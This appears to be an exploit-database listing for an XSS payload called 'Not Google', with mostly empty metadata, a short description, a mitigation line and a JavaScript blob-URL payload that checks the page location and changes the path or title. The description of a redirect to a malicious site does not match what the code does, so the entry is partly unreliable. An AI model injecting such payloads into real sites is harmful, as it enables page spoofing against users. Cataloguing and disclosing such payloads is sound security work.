header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
8,8
CVSS
HIGH
Cross-site Scripting (XSS)
79
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Not Google

This exploit uses a malicious script to redirect users to a malicious website if they are not on Google.com. If they are on Google.com, the title of the page is changed to 'Google Search'.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

<script>
location=URL.createObjectURL(new Blob(['<b>Not Google</b><script>if(location.href.indexOf("google")==-1){location.pathname="https://www.google.com/"}else{document.title="Google Search"}<\/script>'], {type: 'text/html'}))
</script>

Navigation

Suggest Exploit

Services By CQR